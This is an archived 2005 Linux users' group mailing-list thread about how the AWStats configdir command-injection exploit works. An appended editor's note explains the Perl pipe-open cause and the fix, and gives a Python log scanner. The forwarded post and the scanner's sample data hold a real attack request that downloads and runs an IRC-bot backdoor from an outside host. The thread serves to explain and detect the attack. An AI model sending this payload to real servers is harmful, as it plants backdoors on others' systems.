[TriLUG] How does this exploit work?

Steve Hoffman srhoffman at gmail.com
Fri Aug 12 14:40:20 EDT 2005


The flaw comes from the awstats Perl file running system commands.   Our
system got hit by it a few months ago...I could see in the http logs
these requests that basically ran simple commands like uname -a or
similar...then downloaded a file to /tmp or /var/tmp...and executed that
file, which was nothing more than a back door into your system that ran
over an IRC port or something.  Some of it was Perl code, the rest was
compiled C/C++.

I've since moved the location of the awstats aliases to
/site_statistics/, since they search for awstats in the traditional
locations, and also password protected said directory with .htaccess
and chrooted apache.  They say that newer versions are not susceptible
to the attack, but I was able to get it to work on 6.3 and 6.4 by
mixing up the commands a little.

If you're that worried about it, awstats can generate the html your
browser would see and write it to a web directory via cron...in that
case there's no cgi necessary...although I don't expect you'd have the
ability to check previous months stats.

I couldn't really blame apache because I explicitly allowed cgi
execution (required for awstats to run).  I can't find anything as
customizable or easy to use (and free) so I just secure it as best I
can and go from there.

I'm no pro on this part, but the way I see it is that awstats is
allowed to call other executable files and modules to display your
page.  I think this exploit is quite similar to SQL injection, whereby
you are escaping expected input and running your own command.

Steve

On 8/12/05, Rick DeNatale <rick.denatale at gmail.com> wrote:
> This appeared on the awstats discussion list.  I'm curious as to where
> the security hole lies here.  Is it in awstats or in apache?
> 
> If I am decoding this correctly, the exploit feeds a shell command
> starting with a pipe character to awstats.pl as the config parameter.
> My question is, which software actually interprets this as a shell
> command to be executed? I think that it must be apache since awstats
> seems to take the parameter as a filename string and looks for a
> filename and then open it and parse the contents.
> 
> 
> ---------- Forwarded message ----------
> From: SourceForge.net <noreply at sourceforge.net>
> Date: Aug 12, 2005 6:39 AM
> Subject: [awstats - Open Discussion] RE: hacking
> To: noreply at sourceforge.net
> 
> 
> 
> Read and respond to this message at:
> https://sourceforge.net/forum/message.php?msg_id=3291408
> By: nobody
> 
> awstats.pl can be used to drop IRC-Bots using the "configdir" argument.
> 
> I just discovered so.
> "GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20www%2eirc%2dbots%2eorg%2fx%2etar%2egz%3btar%20xvzf%20x%2etar%2egz%3bcd%20x%3b%2e%2fcrond%3becho%20e_exp%3b%2500 HTTP/1.1"
> 
> ______________________________________________________________________
> You are receiving this email because you elected to monitor this forum.
> To stop monitoring this forum, login to SourceForge.net and visit:
> https://sourceforge.net/forum/unmonitor.php?forum_id=43428
> --
> TriLUG mailing list        : http://www.trilug.org/mailman/listinfo/trilug
> TriLUG Organizational FAQ  : http://trilug.org/faq/
> TriLUG Member Services FAQ : http://members.trilug.org/services_faq/
> TriLUG PGP Keyring         : http://trilug.org/~chrish/trilug.asc
>
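
Editor's note (added to this archive page; not part of either message
above, and not code from AWStats): the pipe is interpreted by Perl, not
by Apache.  Apache only hands the query string to awstats.pl through the
CGI environment.  The script builds a file path from the configdir or
config value and passes it to Perl's two-argument open(), and a
two-argument open() whose filename begins with "|" runs the rest of the
string as a shell command instead of opening a file.  The Python below,
written for this page, re-joins the request line from the forwarded post,
decodes it once the way a CGI would, shows the command a pipe-open would
hand to the shell, and scans a few constructed Apache access-log lines for
the same pattern, which is the kind of check Steve describes doing by eye
in his http logs.  The IP addresses, timestamps, the benign requests and
the log envelopes are made up; the malicious request line is the one
quoted above.

```python
import re

# Request line from the forwarded SourceForge post, re-joined onto one
# line (the e-mail wrapped it inside "wget" and inside "%3b").
REQUEST_LINE = (
    "GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3b"
    "wget%20www%2eirc%2dbots%2eorg%2fx%2etar%2egz%3btar%20xvzf%20x%2etar%2egz%3b"
    "cd%20x%3b%2e%2fcrond%3becho%20e_exp%3b%2500 HTTP/1.1"
)

# Query parameters awstats.pl uses to locate its configuration file.
AWSTATS_PARAMS = ("configdir", "config")
SHELL_META = re.compile(r"[;|&`$<>]")


def awstats_params(request_target):
    """Return the once-decoded configdir/config values of an awstats.pl
    request target, or {} if the target is not awstats.pl at all."""
    from urllib.parse import parse_qs
    path, _, query = request_target.partition("?")
    if not path.endswith("awstats.pl"):
        return {}
    qs = parse_qs(query, keep_blank_values=True)
    return {k: qs[k][0] for k in AWSTATS_PARAMS if k in qs}


def pipe_open_command(value):
    """Emulate what Perl's two-argument open() makes of a filename: after
    trimming whitespace, a leading '|' means 'run the rest as a command and
    write to it', a trailing '|' means 'run the rest and read from it'.
    Returns the command string, or None when the value is a plain file."""
    v = value.strip()
    if v.startswith("|"):
        return v[1:].strip()
    if v.endswith("|"):
        return v[:-1].strip()
    return None


def decode_request(request_line):
    """Parse 'METHOD target HTTP/x.y'; return (param, value, command) for
    the first awstats config parameter found, or None."""
    fields = request_line.split(" ")
    if len(fields) < 2:
        return None
    for name, value in awstats_params(fields[1]).items():
        return name, value, pipe_open_command(value)
    return None


# Constructed Apache combined-format lines.  Only the third request is real.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Aug/2005:10:01:02 -0400] "GET /cgi-bin/awstats.pl'
    '?config=example.org&month=07&year=2005 HTTP/1.1" 200 14233 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [12/Aug/2005:10:02:15 -0400] "GET /index.html HTTP/1.1"'
    ' 200 512 "-" "Mozilla/5.0"',
    '198.51.100.77 - - [12/Aug/2005:06:39:00 -0400] "' + REQUEST_LINE
    + '" 200 0 "-" "Wget/1.9"',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"')


def scan_log(lines):
    """Flag awstats.pl requests whose config/configdir value would be run
    as a pipe command or carries shell metacharacters."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_request(m.group("req"))
        if decoded is None:
            continue
        name, value, cmd = decoded
        if cmd is not None or SHELL_META.search(value):
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "param": name, "value": value, "command": cmd})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["time"]} {hit["param"]}={hit["value"]!r}')
        if hit["command"]:
            print("  shell would run:", hit["command"])
```

The decoded configdir value starts with "|" and contains the whole
download-unpack-execute chain, so the detector flags that line and leaves
the ordinary config=example.org request alone.  After a single round of
decoding the trailing %2500 is the literal text %00; it is presumably
intended as a NUL terminator to cut off whatever the script appends to the
path.  The fix on the Perl side is the three-argument form,
open(my $fh, '<', $path), which never treats a leading or trailing "|"
specially, plus restricting the config name to a safe character set such
as [A-Za-z0-9_.-] before it is used in any path.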